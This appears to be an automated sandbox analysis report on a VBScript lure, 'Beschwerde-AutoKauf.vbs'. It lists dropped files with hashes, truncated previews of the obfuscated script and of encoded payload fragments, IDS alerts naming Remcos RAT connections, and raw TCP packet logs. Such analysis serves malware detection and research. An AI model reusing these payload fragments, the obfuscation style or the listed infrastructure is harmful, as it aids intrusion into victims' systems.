                                                                          Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-

                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\0ce988b5-a9be-4355-b0c6-ea0ecdbc8beb.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                          Category:dropped
                                                                          Size (bytes):386528
                                                                          Entropy (8bit):7.9736851559892425
                                                                          Encrypted:false
                                                                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                          Malicious:false
                                                                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\1033d46b-185f-4f18-9932-51cfe5ff685d.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                          Category:dropped
                                                                          Size (bytes):1419751
                                                                          Entropy (8bit):7.976496077007677
                                                                          Encrypted:false
                                                                          SSDEEP:24576:/xA7owWLcGZtwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLcGZtwZGk3mlind9i4ufFXpAXkru
                                                                          MD5:A46246FAEAB95D87F5B4FE236C2B3D3E
                                                                          SHA1:7F018DB9238A63FEAD8D11A92297E7366058A75A
                                                                          SHA-256:7E822FECC47177C5A7F4C250E7D53509D104DE68B0D0CE9445877B508400988E
                                                                          SHA-512:8AAB79958BF39F014FBA7F69287FE0C357746E63FA3482DE3231BDF4A97B964A0815DAF7BFE9751C55BA6BE618E0A964CEB23FC30B4FA9DFEB284F42EBA897BF
                                                                          Malicious:false
                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\11ddf87d-2121-4120-9adf-83ba97cf3bed.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                          Category:dropped
                                                                          Size (bytes):1407294
                                                                          Entropy (8bit):7.97605879016224
                                                                          Encrypted:false
                                                                          SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                          MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                          SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                          SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                          SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                          Malicious:false
                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\d2d50bb8-9748-425e-b5d6-cee60a2bcf5e.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                          Category:dropped
                                                                          Size (bytes):758601
                                                                          Entropy (8bit):7.98639316555857
                                                                          Encrypted:false
                                                                          SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                          MD5:3A49135134665364308390AC398006F1
                                                                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                          Malicious:false
                                                                          Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                          C:\Users\user\AppData\Local\Temp\romerret.vbs

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):69536
                                                                          Entropy (8bit):4.953449867882463
                                                                          Encrypted:false
                                                                          SSDEEP:1536:bBzJwZlEIwqhzHJC0B9TWPWNBm3tG6ZOfWRtF59ai7ajc:bBdExJCECWNB2tG6ZiYttai7ic
                                                                          MD5:2A2C6135AD5B992F99A4D4E455F68BDE
                                                                          SHA1:D307F653ABDFEC2337BC2048BC60A20182373250
                                                                          SHA-256:B51CC6DCA8A013FF07CB1B473F01543D55440151444B284DE3773CC3EBC54F82
                                                                          SHA-512:C183F905BBB7C4FD769B132439ACBC43988BAE3E16C1E6C601C86567A41C2D344049EC213446CF691CADF1DA3A5E1F5D23C9B1B744E681727E1764CBEF7EC675
                                                                          Malicious:true
                                                                          Preview:..'Senarii46; fortaage stejlede; stigrrenes..'proton recordative, pardansenes;..'Mntfoden loopful..'Coloured? trvegrave. blokerklring..'Styrelseslove66 trapezist. retrocede harlekindragt presells58..'Flippermaskines, husgerningerne73 befingringens,..'Fewnesses golden89 fogfruits polyglandular!..'Bycenteret, redealing! entomologized talipeds undervisningsbrugens,..'Hjemmearbejdspladsen overdver; hyke. micromorph,..'shoulderer! stemningslejet164 uddannelserne...'Manchesterdom205: biophysiologist65,..'Aflselige146 materialiseringen.....'Allonges181, purfler antireligiously: authoritarianisms tobiser...'Narthex skinnermmer; recrowd230;..'Militrguvernren141 frgemandens..'Coachfellow128, outhold? hepatize zonitoides. halvpension..'Partyless237 sammentrykt; tommelfingres omprvelse..'degomme reboulia. egypternes; igangsttende gulgul..'Sikkerhedsstyrkerne, nonauthentical..'Dissonansernes deprecative! protestantish..'Udtmm: humidifiers? benhaardes; slipperserne, ubndigt:..'Kal yvor resplend: exp

                                                                          C:\Users\user\AppData\Roaming\Milieuplanerne.Chl

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):460328
                                                                          Entropy (8bit):5.836524547051476
                                                                          Encrypted:false
                                                                          SSDEEP:6144:upWP/CPylsC6Uq61fhQXHoE8f/bunqJr/NMclHrli+LLrY3jQmv3Cu3D2mtq176:OWP/rsN6aIPR3lHZVLMcw3C2T0+
                                                                          MD5:B49CA7656CE66E2633C5F38E182C201A
                                                                          SHA1:10E6501E449B511DA7A71EABC83CA627BC6D3BE9
                                                                          SHA-256:B1172375DF59F6200F769AEC51F58B89C6B5CCCD900D86500760FDEA21997B56
                                                                          SHA-512:48F67E09460ED606D97695991233B005A640130E95997F543A9713F875D9044A67CC0B289F75FC7C5C47544A02F6BEE98AAAA33E8FC214E7B06863098563CA94
                                                                          Malicious:false
                                                                          Preview:cQGbcQGbu7GBFgBxAZtxAZsDXCQE6wJoM+sCwk65Yi8DPesCRyzrAllggem6bCD86wInA+sC28uB6ajC4kDrAlEV6wKba3EBm+sCJha6Qo4U4usCl4DrAvhU6wLDRHEBmzHKcQGbcQGbiRQL6wIVJ3EBm9Hi6wLI+usCCdqDwQTrAiAB6wLqoYH5D/FKBHzK6wJAQusCOb6LRCQE6wIVe+sCPmeJw3EBm+sCzL6Bw59EdwBxAZvrAocNuqxBv7DrAgvNcQGbgepn+Xnz6wKQ5esC7PuB6kVIRb1xAZtxAZvrAgSscQGbcQGbcQGbiwwQcQGb6wIOe4kME3EBm3EBm0JxAZvrAhu3gfqA1AQAddfrAoepcQGbiVwkDHEBm3EBm4HtAAMAAHEBm+sCWUSLVCQI6wJn9esCcSGLfCQE6wIJsOsCJiKJ63EBm+sCI7yBw5wAAADrAhN6cQGbU+sC7GDrAkt8akBxAZtxAZuJ63EBm+sCqRjHgwABAAAAgGQE6wLljnEBm4HDAAEAAOsCRhzrAhWtU3EBm+sCHE2J6+sCi4LrAhPFibsEAQAA6wJUlXEBm4HDBAEAAHEBm3EBm1PrAkiq6wL5TGr/cQGb6wJf4YPCBesC3JdxAZsx9usCEBZxAZsxyesCG67rAkU0ixrrAulL6wJC4EFxAZvrAnclORwKdfPrArnfcQGbRusCRG/rAtoRgHwK+7h13OsCcBzrAtWFi0QK/OsCwETrApf7KfBxAZtxAZv/0nEBm+sCd5W6gNQEAHEBm+sCvC4xwHEBm+sCp4SLfCQMcQGb6wIaSIE0BxE1QkHrAhIq6wJhA4PABOsCxa5xAZs50HXjcQGbcQGbiftxAZvrAmiO/9frAjZ/cQGb+TVCQRFuy6SQ2YcBvDLDhdQI70ZEvKf4IqnTd5DE1SAaNcOwLp785ZDEwRc1p3qtkcg2hlU4QrUlZsTE0bQ2TBEM3XBvw4MYkFlPQZEES52QWU9BXE8b

                                                                          C:\Users\user\AppData\Roaming\raadede.Erg

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):479080
                                                                          Entropy (8bit):5.8494141384874725
                                                                          Encrypted:false
                                                                          SSDEEP:6144:D/dAs0B9mlSeg9ETsqKoXc090VVZ0GRdrnPcfmA8cJsUS9aSeFtFp80y:mxBEkRm48XcO/4dr1cChHCH80y
                                                                          MD5:E30AA67FE8EF314262FFB9F3B6B691D4
                                                                          SHA1:C2C8E7A338A41990C68BA977E7B342CA81B91652
                                                                          SHA-256:7F1C8C56B0022A953E0549CF37A6E9B4F57C2A1681AA51A101B138275B8CC54C
                                                                          SHA-512:01824DFEB49A36B16511D4671D6A784C4DC72E966E01EA9D0FB323937E23FFFFDAE0D0C35DA54DC127BFD662538CDF7548FCAA32BFC8B49F440F9D5E6EED0E8E
                                                                          Malicious:false
                                                                          Preview:cQGbcQGbu6YaHQBxAZvrAh48A1wkBOsCp3nrAnJNuR/bDtzrAtcE6wLGCoHpIByd++sCBx1xAZuB6f++ceBxAZvrArTc6wK12OsClAS68pEV7usCdGLrAkzScQGbcQGbMcrrAmqXcQGbiRQLcQGbcQGb0eLrAqr56wLhU4PBBOsChSnrAo4VgfkaCKsFfMvrArho6wJ8GYtEJATrAj1n6wLVbYnD6wJwMesC1OiBw+9/oQRxAZtxAZu6EY2gVusCeU/rAoz8gfLp1Nh+cQGb6wItBYHCCKaH1+sCd41xAZtxAZtxAZtxAZvrApuiiwwQcQGb6wLxfIkME3EBm3EBm0JxAZtxAZuB+kgNBQB11+sCM6BxAZuJXCQM6wLJPesC3KSB7QADAADrAmUXcQGbi1QkCOsCIDjrAi/Bi3wkBHEBm+sCNPyJ6+sCkcFxAZuBw5wAAADrAo8qcQGbU3EBm+sCVARqQHEBm+sCNRCJ6+sC00BxAZvHgwABAAAAMMsF6wIBROsCvgKBwwABAADrAmdV6wKFwFPrAot+6wI/jonr6wJz73EBm4m7BAEAAHEBm3EBm4HDBAEAAHEBm+sCbYBTcQGbcQGbav/rAsblcQGbg8IF6wIQVusCGC0x9usCM2dxAZsxyXEBm+sCiNyLGnEBm3EBm0FxAZvrAiJUORwKdfPrAkp/6wLcMUZxAZvrAm2SgHwK+7h13HEBm+sC1+SLRAr8cQGbcQGbKfBxAZvrAtTw/9JxAZvrAlSMukgNBQBxAZvrAt3SMcBxAZvrAuivi3wkDOsCZijrAgSLgTQHwXXgPHEBm3EBm4PABHEBm3EBmznQdeZxAZvrAusLifvrAqMKcQGb/9frAuHi6wL7D6eCI/C9neM8wXWGuRLxO2dIkGHQCj+xO0CxK3uQcrW1JMxAPobcYc0SYarcQISYvDakYdUy4BqkRYgneMx1J5n5KGF4zHWRmU6bYUjMdayN/zphSMx1lMY3cWTn

                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                          Download File
                                                                          Process:C:\Windows\System32\svchost.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):55
                                                                          Entropy (8bit):4.306461250274409
                                                                          Encrypted:false
                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                          Malicious:false
                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                          Static File Info

                                                                          General

                                                                          File type:ASCII text, with CRLF line terminators
                                                                          Entropy (8bit):4.958082425468153
                                                                          TrID:
                                                                          • Visual Basic Script (13500/0) 100.00%
                                                                          File name:Beschwerde-AutoKauf.vbs
                                                                          File size:69'489 bytes
                                                                          MD5:4446681fce0cae163942eb162fd4ee76
                                                                          SHA1:9c235cf72cebbbb0c5bd480add8f1c2db437b793
                                                                          SHA256:7ab71eea03d84976609bb0ed19aa1b33b784731a357065900618ae4c3b8761db
                                                                          SHA512:59dbcf1a8255e51f29825856cbeef269cf0584350570bb073dd5988a0ab2bbc6a8a13628405d30e7056b722b64be2e06e86ac576c0d1609dd524f0e1d95afb5f
                                                                          SSDEEP:1536:TX7JwDwA6PgDQSjdOWZOVKgHrf6ZufkDt159fW7ajc:TXPIciZ+Korf6ZC2tdfW7ic
                                                                          TLSH:11634C71DD640B564D4B2B6EFC516E65C9BDC205162710F1FED8074EA00B8ACE3FE25A
                                                                          File Content Preview:..'Senarii46; fortaage stejlede; stigrrenes..'proton recordative, pardansenes;..'Mntfoden loopful..'Coloured? trvegrave. blokerklring..'Styrelseslove66 trapezist. retrocede harlekindragt presells58..'Flippermaskines, husgerningerne73 befingringens,..'Fewn

                                                                          File Icon

                                                                          Icon Hash:68d69b8f86ab9a86

                                                                          Network Behavior

                                                                          Suricata IDS Alerts

                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-11-30T20:15:37.218633+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44973792.205.55.123443TCP
                                                                          2024-11-30T20:15:41.766250+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.44973845.88.88.339945TCP
                                                                          2024-11-30T20:15:44.172506+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.44973945.88.88.339945TCP
                                                                          2024-11-30T20:15:44.281889+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.44974045.88.88.339945TCP
                                                                          2024-11-30T20:15:44.356588+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449741178.237.33.5080TCP

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Nov 30, 2024 20:15:00.463484049 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:00.463586092 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:00.463737965 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:00.470556974 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:00.470602036 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:02.370090008 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:02.370208025 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:02.454006910 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:02.454077959 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:02.454477072 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:02.500535965 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:02.508189917 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:02.555330992 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:02.988611937 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:02.988636971 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:02.988645077 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:02.988656998 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:02.988688946 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:02.988745928 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:02.988811016 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:02.988872051 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:02.988872051 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.204941988 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.204957962 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.204992056 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.205048084 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.205089092 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.205128908 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.205151081 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.248151064 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.248179913 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.248253107 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.248280048 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.248347044 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.385994911 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.386039972 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.386204004 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.386225939 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.386310101 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.427033901 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.427058935 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.427170992 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.427238941 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.427292109 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.456119061 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.456144094 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.456219912 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.456238985 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.456295013 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.489556074 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.489610910 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.489744902 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.489778042 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.489835978 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.581422091 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.581443071 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.581551075 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.581587076 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.581645012 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.611047029 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.611062050 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.611166954 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.611187935 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.611246109 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.627696991 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.627712965 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.627782106 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.627799034 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.627860069 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.640726089 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.640743017 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.640815020 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.640834093 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.640861034 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.640882015 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.652077913 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.652093887 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.652194023 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.652210951 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.652267933 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.760677099 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.760694981 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.760787010 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.760812044 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.760870934 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.773190975 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.773207903 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.773313046 CET49730443192.168.2.4217.160.0.118
                                                                          Nov 30, 2024 20:15:03.773333073 CET44349730217.160.0.118192.168.2.4
                                                                          Nov 30, 2024 20:15:03.773381948 CET49730443192.168.2.4217.160.0.118
